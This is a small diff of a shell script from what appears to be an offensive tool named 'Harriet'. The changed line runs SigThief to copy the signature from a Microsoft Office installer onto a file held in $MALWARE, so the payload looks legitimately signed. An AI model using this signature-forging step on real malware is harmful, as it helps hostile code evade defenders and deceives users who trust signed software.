|
@@ -94,7 +94,7 @@ sleep 2
|
|
|
echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
|
|
echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
|
|
|
echo ""
|
|
echo ""
|
|
|
sleep 2
|
|
sleep 2
|
|
|
-python3 Harriet/Resources/SigThief/sigthief.py -i Harriet/Resources/officedeploymenttool.exe -t $MALWARE -o signed.exe >/dev/null 2>&1
|
|
|
|
|
|
|
+python3 Harriet/Resources/SigThief/sigthief.py -i Harriet/Resources/OfficeSetup.exe -t $MALWARE -o signed.exe >/dev/null 2>&1
|
|
|
mv signed.exe $MALWARE
|
|
mv signed.exe $MALWARE
|
|
|
echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
|
|
echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
|
|
|
echo ""
|
|
echo ""
|